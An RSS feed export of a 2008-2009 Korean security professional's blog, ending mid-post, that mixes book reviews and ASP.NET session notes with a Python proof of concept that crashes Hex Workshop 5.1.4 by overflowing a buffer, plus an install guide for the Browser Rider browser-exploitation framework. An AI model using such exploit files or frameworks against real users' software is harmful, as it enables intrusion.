<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet href="http://rss.egloos.com/style/blog.xsl" type="text/xsl" media="screen"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
	<title>Security Professional - Paul Jang</title>
	<link>http://misman95.egloos.com</link>
	<description>Security is an art, not a science.</description>
	<language>ko</language>
	<pubDate>Fri, 06 Feb 2009 03:00:55 GMT</pubDate>
	<generator>Egloos</generator>
	<image>
		<title>Security Professional - Paul Jang</title>
		<url>http://pds7.egloos.com/logo/200805/22/52/d0010152.jpg</url>
		<link>http://misman95.egloos.com</link>
		<width>80</width>
		<height>60</height>
		<description>Security is an art, not a science.</description>
	</image>
  	<item>
		<title><![CDATA[ Email ]]> </title>
		<link>http://misman95.egloos.com/2225836</link>
		<guid>http://misman95.egloos.com/2225836</guid>
		<description>
			<![CDATA[ 
  email<br><a href="http://blog.naver.com/eom2005?Redirect=Log&amp;logNo=70037499707">http://blog.naver.com/eom2005?Redirect=Log&amp;logNo=70037499707</a><br><br><a href="http://cafe.naver.com/hanahd.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=251">http://cafe.naver.com/hanahd.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=251</a>			 ]]> 
		</description>
		<category>Memo</category>

		<comments>http://misman95.egloos.com/2225836#comments</comments>
		<pubDate>Fri, 06 Feb 2009 03:00:55 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ Wireless Hacking ]]> </title>
		<link>http://misman95.egloos.com/2224448</link>
		<guid>http://misman95.egloos.com/2224448</guid>
		<description>
			<![CDATA[ 
  <style></style><a href="http://www.youtube.com/watch?v=TiPWUykw3uU">http://www.youtube.com/watch?v=TiPWUykw3uU</a>			 ]]> 
		</description>
		<category>Network Security</category>

		<comments>http://misman95.egloos.com/2224448#comments</comments>
		<pubDate>Wed, 04 Feb 2009 15:08:05 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ Hex Workshop 5.1.4 Local Buffer Overflow POC ]]> </title>
		<link>http://misman95.egloos.com/2196530</link>
		<guid>http://misman95.egloos.com/2196530</guid>
		<description>
			<![CDATA[ 
  <p><span style="Font-family: Malgun Gothic; Font-size: 9pt;">다음 코드를 실행한 다음 생성된 파일을 임포트한다.<br />
<br />
<br />
#exploit.py<br />
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc<br />
# other versions are affected <br />
# <br />
# By:Encrypt3d.M!nd<br />
# Merry Christmas & Happy New Year 2009<br />
#<br />
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends<br />
################################################################################<br />
#<br />
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^<br />
# I Think it's Easy To Exploit but need some work *_^<br />
<br />
chars = "A"*4500<br />
<br />
foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"<br />
<br />
file=open('enc.cmap','w+')<br />
file.write("\x22"+chars+"\x22"+foot)<br />
file.close()<br />
</span></p>			 ]]> 
		</description>
		<category>Vulnerability</category>

		<comments>http://misman95.egloos.com/2196530#comments</comments>
		<pubDate>Thu, 08 Jan 2009 00:31:54 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ World Fastest MD5 cracker BarsWF ]]> </title>
		<link>http://misman95.egloos.com/2166684</link>
		<guid>http://misman95.egloos.com/2166684</guid>
		<description>
			<![CDATA[ 
  <a href="http://3.14.by/en/md5"><br><br>http://3.14.by/en/md5</a>			 ]]> 
		</description>
		<category>Tools</category>

		<comments>http://misman95.egloos.com/2166684#comments</comments>
		<pubDate>Wed, 10 Dec 2008 06:49:32 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ [WebHacking]Browser Rider ]]> </title>
		<link>http://misman95.egloos.com/2166576</link>
		<guid>http://misman95.egloos.com/2166576</guid>
		<description>
			<![CDATA[ 
  <p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Browser Rider<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></span></b></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Browser Rider is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit. Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO"><o:p>&nbsp;</o:p></span></b></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Download</span></b><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'"><o:p></o:p></span></b></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'">http://engineeringforfun.com/browserrider.html<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Requirement</span></b><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'"><o:p></o:p></span></b></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'">- PHP 5, with json installed</span><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO"><o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">- Mysql<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'">- Apache with url_rewrite on<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'">- Targets must have Javascript turned on <o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt; TEXT-INDENT: 13.5pt; mso-char-indent-count: 1.5"><span lang="EN-US" style="FONT-SIZE: 9pt; COLOR: blue; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO"><o:p></o:p></span></p><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Installation<o:p></o:p></span></b><p></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">1. create a mysql table for Browser rider and dump the create.sql file in it<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">2. edit the .htaccess file for url rewriting to work. To give you an example, on my localhost BR is located at the following url:<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">http://localhost/projects/BrowserRider/ so my .htaccess file contains<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">the following line:<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; COLOR: blue; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">RewriteBase /projects/BrowserRider/<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">3. the final step is to edit the configuration.php file located in the 'lib' folder. You can follow the current documentation to do so: http://www.engineeringforfun.com/wiki/index.php/Browser_Rider_Installation under the section "Editing lib/configuration.php". What needs to be updated are: your mysql login and password, the 'BASE_URL' constant and the $FALSE_URL_REWRITING_VARS variable.<br><o:p><br></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><b style="mso-bidi-font-weight: normal"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">Appendix<o:p></o:p></span></b></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">json installation<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">1. download from http://www.aurore.net/projects/php-json/win32/1.1.1/<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt"><span lang="EN-US" style="FONT-SIZE: 9pt; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">2. add the follow line to php.ini<o:p></o:p></span></p><p class="MsoNormal" style="MARGIN: 0mm 0mm 0pt; TEXT-INDENT: 13.5pt; mso-char-indent-count: 1.5"><span lang="EN-US" style="FONT-SIZE: 9pt; COLOR: blue; FONT-FAMILY: 'Malgun Gothic'; mso-fareast-language: KO">extension=php_json.dll<o:p></o:p></span></p></o:p></span>			 ]]> 
		</description>
		<category>Tools</category>

		<comments>http://misman95.egloos.com/2166576#comments</comments>
		<pubDate>Wed, 10 Dec 2008 04:16:11 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ Security Metrics: Replacing Fear, Uncertainty, and Doubt ]]> </title>
		<link>http://misman95.egloos.com/2165690</link>
		<guid>http://misman95.egloos.com/2165690</guid>
		<description>
			<![CDATA[ 
  <p><span style="FONT-SIZE: 9pt; FONT-FAMILY: Malgun Gothic"><img class="image_left" border="0" onmouseover="this.style.cursor='pointer'" alt="" src="http://pds10.egloos.com/pds/200812/09/52/d0010152_493e2f4e3c617.jpg" width="240" height="240" onclick="Control.Modal.openDialog(this, event, 'http://pds10.egloos.com/pds/200812/09/52/d0010152_493e2f4e3c617.jpg');" align="left" />솔직히 말하면 꽤 어려웠다. 단어도 어렵고..수학 용어도 많이 나오고..<br>시간적인 문제도 있고 해서 이해되는 부분만 이해하자는 마음으로 술술~~ 읽었는데...<br><br>지금 기억에 남아 있는 건&nbsp;그래프 정도?<br><br>어떻게 하면 보는 사람(고객)이 빨리 이해할 수 있고, 보기에도 좋은 그래프를 만드는 팁이 소개되어 있는 부분이 있다.<br><br>시큐리티에 있어서, ALE라든가&nbsp;ROI 등 측정하기 어려운 부분이 많기&nbsp;어떻게 하면 잘 보여줄 수 있을까 하는 Visualization이 화제가 되었겠는가.<br><br>본인도 그래프를 작성할 일이 꽤 많은 편이고, 가끔 고객으로부터 그래프에 관해서 이런저런 질문을 받곤 하는데.. 그래서 그래프에 관한 것만 머릿속에 남았는지도....<br><br>암튼 어쩌다 보니 그래프에 관한 내용으로 일관해 버렸지만, 데이터 수집이라든가 분석(툴) 이 핵심이라고 할 수 있다. 강력 추천!</span></p>			 ]]> 
		</description>
		<category>Books</category>

		<comments>http://misman95.egloos.com/2165690#comments</comments>
		<pubDate>Tue, 09 Dec 2008 08:56:37 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ CISO Leadership: Essential Principles for Success ]]> </title>
		<link>http://misman95.egloos.com/2165677</link>
		<guid>http://misman95.egloos.com/2165677</guid>
		<description>
			<![CDATA[ 
  <p><span style="FONT-SIZE: 9pt; FONT-FAMILY: Malgun Gothic"><img class="image_left" border="0" onmouseover="this.style.cursor='pointer'" alt="" src="http://pds10.egloos.com/pds/200812/09/52/d0010152_493e2b8e45b0d.jpg" width="180" height="279" onclick="Control.Modal.openDialog(this, event, 'http://pds10.egloos.com/pds/200812/09/52/d0010152_493e2b8e45b0d.jpg');" align="left" />가격이 결코 싸지 않음에도 불구하고 대단히 만족감을 안겨준 책이다.<br>제목 그대로 기술적인 면은 전혀 다루고 있지 않고,&nbsp;리더쉽, 커뮤니케이션 능력, 비즈니스 통찰력 등 소프트스킬에&nbsp;관한 내용이 주를 이루고 있다.<br><br>CISO는 경영진에 속하는 상위 관리자로서, 최고 경영층에게 어떻게 시큐리티를 세일즈할 것인지가 큰 과제가 되는데, 이에 대한 견해라든가, 프로젝트 진행에 관해서 주의할 점 등. 여러 가지 주제에 관해 여러 사람이 집필한 글을 엄선한 책이다.</span></p>			 ]]> 
		</description>
		<category>Books</category>

		<comments>http://misman95.egloos.com/2165677#comments</comments>
		<pubDate>Tue, 09 Dec 2008 08:38:20 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ ビジネスマンのための「発見力」養成講座 ]]> </title>
		<link>http://misman95.egloos.com/2105808</link>
		<guid>http://misman95.egloos.com/2105808</guid>
		<description>
			<![CDATA[ 
  <img class="image_left" border="0" onmouseover="this.style.cursor='pointer'" alt="" src="http://pds10.egloos.com/pds/200810/20/52/d0010152_48fc8fdfadb29.jpg" width="200" height="350" onclick="Control.Modal.openDialog(this, event, 'http://pds10.egloos.com/pds/200810/20/52/d0010152_48fc8fdfadb29.jpg');" align="left" />비즈니스맨을 위한 발견력 양성강좌<br>이렇게 하면 보이지 않는 것이 보이게 된다.<br><br>아무도 보지 못하는 것을 볼 수 있는 사람.<br>흔히 그냥 무관심 속에 지나쳐 버릴 수 있는 것들을 리뷰하고 재조립하여 새로운 것을 창조해 낸다.<br>그것은 주의 깊은 관심으로부터 출발하며, 그 뒤에 숨어 있는 것을 찾아내려고 하는 노력인 것이다.<br>What 을 아는 것에 그치지 말고, Why 에 대한 대답을 얻도록 하는 습관을 길러야 할 것이다.			 ]]> 
		</description>
		<category>Books</category>

		<comments>http://misman95.egloos.com/2105808#comments</comments>
		<pubDate>Mon, 20 Oct 2008 14:11:02 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ 人生のプロジェクト(Project of Life) ]]> </title>
		<link>http://misman95.egloos.com/2105785</link>
		<guid>http://misman95.egloos.com/2105785</guid>
		<description>
			<![CDATA[ 
  <img class="image_left" border="0" onmouseover="this.style.cursor='pointer'" alt="" src="http://pds11.egloos.com/pds/200810/20/52/d0010152_48fc8d09ae0e5.jpg" width="200" height="284" onclick="Control.Modal.openDialog(this, event, 'http://pds11.egloos.com/pds/200810/20/52/d0010152_48fc8d09ae0e5.jpg');" align="left" />기한이 정해져 있는 것은 모두 프로젝트이다.<br><br>두명의 남자가 젠가(블록 쌓기 게임)를 하고 있다. <br>너희들 무엇을 하고 있니? 라고 물었더니 한 명은 "젠가를 쌓고 있다" 고 답했다. 다른 한 명은 "교회를 짓고 있다" 고 답했다. <br>이 두명의 미래는 전혀 다른 것이 되었다.<br><br>사진과 글의 밸런스가 잘 이루어져 있는 책으로 군더더기 빼고 핵심만 말하고 있으며, 많은 사진을 보면서&nbsp;글을 읽고 있다 보니 시간 가는 줄도 몰랐다.<br><br>장황하지도 않고 결코 어렵지도 않은 프로젝트 입문서!<br><br>자신의 인생이라는 긴 프로젝트를 어떻게 성공시킬 것인가?			 ]]> 
		</description>
		<category>Books</category>

		<comments>http://misman95.egloos.com/2105785#comments</comments>
		<pubDate>Mon, 20 Oct 2008 13:58:25 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
	<item>
		<title><![CDATA[ ASP .NET 의 Session 관리 방법 ]]> </title>
		<link>http://misman95.egloos.com/2100058</link>
		<guid>http://misman95.egloos.com/2100058</guid>
		<description>
			<![CDATA[ 
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 11"><meta name="Originator" content="Microsoft Word 11"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Cmisman95%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"><!--[if gte mso 9]><xml> <w:WordDocument>  <w:View>Normal</w:View>  <w:Zoom>0</w:Zoom>  <w:PunctuationKerning/>  <w:DisplayHorizontalDrawingGridEvery>0</w:DisplayHorizontalDrawingGridEvery>  <w:DisplayVerticalDrawingGridEvery>2</w:DisplayVerticalDrawingGridEvery>  <w:ValidateAgainstSchemas/>  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>  <w:Compatibility>   <w:SpaceForUL/>   <w:BalanceSingleByteDoubleByteWidth/>   <w:DoNotLeaveBackslashAlone/>   <w:ULTrailSpace/>   <w:DoNotExpandShiftReturn/>   <w:AdjustLineHeightInTable/>   <w:BreakWrappedTables/>   <w:SnapToGridInCell/>   <w:WrapTextWithPunct/>   <w:UseAsianBreakRules/>   <w:DontGrowAutofit/>   <w:UseFELayout/>  </w:Compatibility>  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */ @font-face	{font-family:"ＭＳ 明朝";	panose-1:2 2 6 9 4 2 5 8 3 4;	mso-font-alt:"MS Mincho";	mso-font-charset:128;	mso-generic-font-family:roman;	mso-font-pitch:fixed;	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}@font-face	{font-family:Century;	panose-1:2 4 6 4 5 5 5 2 3 4;	mso-font-charset:0;	mso-generic-font-family:roman;	mso-font-pitch:variable;	mso-font-signature:647 0 0 0 159 0;}@font-face	{font-family:"\@ＭＳ 明朝";	panose-1:2 2 6 9 4 2 5 8 3 4;	mso-font-charset:128;	mso-generic-font-family:roman;	mso-font-pitch:fixed;	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}@font-face	{font-family:"Malgun Gothic";	panose-1:2 11 5 3 2 0 0 2 0 4;	mso-font-charset:129;	mso-generic-font-family:swiss;	mso-font-pitch:variable;	mso-font-signature:-1879047505 165117179 18 0 524289 0;}@font-face	{font-family:"\@Malgun Gothic";	panose-1:2 11 5 3 2 0 0 2 0 4;	mso-font-charset:129;	mso-generic-font-family:swiss;	mso-font-pitch:variable;	mso-font-signature:-1879047505 165117179 18 0 524289 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal	{mso-style-parent:"";	margin:0mm;	margin-bottom:.0001pt;	text-align:justify;	text-justify:inter-ideograph;	mso-pagination:none;	font-size:10.5pt;	mso-bidi-font-size:12.0pt;	font-family:Century;	mso-fareast-font-family:"ＭＳ 明朝";	mso-bidi-font-family:"Times New Roman";	mso-font-kerning:1.0pt;} /* Page Definitions */ @page	{mso-page-border-surround-header:no;	mso-page-border-surround-footer:no;}@page Section1	{size:595.3pt 841.9pt;	margin:99.25pt 30.0mm 30.0mm 30.0mm;	mso-header-margin:42.55pt;	mso-footer-margin:49.6pt;	mso-paper-source:0;	layout-grid:18.0pt;}div.Section1	{page:Section1;} /* List Definitions */ @list l0	{mso-list-id:154339392;	mso-list-type:hybrid;	mso-list-template-ids:1142556440 776141726 67698705 67698705 67698703 67698711 67698705 67698703 67698711 67698705;}@list l0:level1	{mso-level-tab-stop:18.0pt;	mso-level-number-position:left;	margin-left:18.0pt;	text-indent:-18.0pt;}@list l0:level2	{mso-level-number-format:decimal-enclosed-circle;	mso-level-text:%2;	mso-level-tab-stop:42.0pt;	mso-level-number-position:left;	margin-left:42.0pt;	text-indent:-21.0pt;}@list l0:level3	{mso-level-number-format:decimal-enclosed-circle;	mso-level-text:%3;	mso-level-tab-stop:63.0pt;	mso-level-number-position:left;	margin-left:63.0pt;	text-indent:-21.0pt;}@list l1	{mso-list-id:1090810952;	mso-list-type:hybrid;	mso-list-template-ids:-454000122 -1402036936 67698711 67698705 67698703 67698711 67698705 67698703 67698711 67698705;}@list l1:level1	{mso-level-tab-stop:18.0pt;	mso-level-number-position:left;	margin-left:18.0pt;	text-indent:-18.0pt;}@list l2	{mso-list-id:1694530131;	mso-list-type:hybrid;	mso-list-template-ids:1459544964 923941856 67698711 67698705 67698703 67698711 67698705 67698703 67698711 67698705;}@list l2:level1	{mso-level-tab-stop:18.0pt;	mso-level-number-position:left;	margin-left:18.0pt;	text-indent:-18.0pt;}ol	{margin-bottom:0mm;}ul	{margin-bottom:0mm;}--></style><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable	{mso-style-name:標準の表;	mso-tstyle-rowband-size:0;	mso-tstyle-colband-size:0;	mso-style-noshow:yes;	mso-style-parent:"";	mso-padding-alt:0mm 5.4pt 0mm 5.4pt;	mso-para-margin:0mm;	mso-para-margin-bottom:.0001pt;	mso-pagination:widow-orphan;	font-size:10.0pt;	font-family:Century;	mso-ansi-language:#0400;	mso-fareast-language:#0400;	mso-bidi-language:#0400;}</style><![endif]--><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">State Server </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">모드</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">정의</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">: ASP .NET</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 세션 관리만 담당하는 서비스로서 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">IIS</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 관리하던세션 관리를 전용 프로세스에게 위탁하는 서비스이다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">장점</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">1.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">웹 서버의 메모리 부하를 분산</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">예를 들어</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">복수의웹서버와 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">1</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">대의 세션 관리 서버가 존재하는 경우에 유저가 증가하면세션 관리 서버의 메모리만 증가시키면 된다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">(</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">각 웹서버의메모리를 증설할 필요가 없다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">).<o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">2.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">어플리케이션을 재기동해도 세션 유지가 가능</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">웹 어플리케이션 또는 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">aspnet_wp.exe </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 재기동되는 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 42pt; text-indent: -21pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">①<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">global.asax</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">、</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">web.config</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 경신된 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 42pt; text-indent: -21pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">②<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">web.config</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">&lt;processModel&gt; </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">요소 중에서프로세스 재기동 조건으로서 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">requestLimit</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">나 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">memoryLimit </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 설정되어 있고</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">그 조건에 부합하는 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" 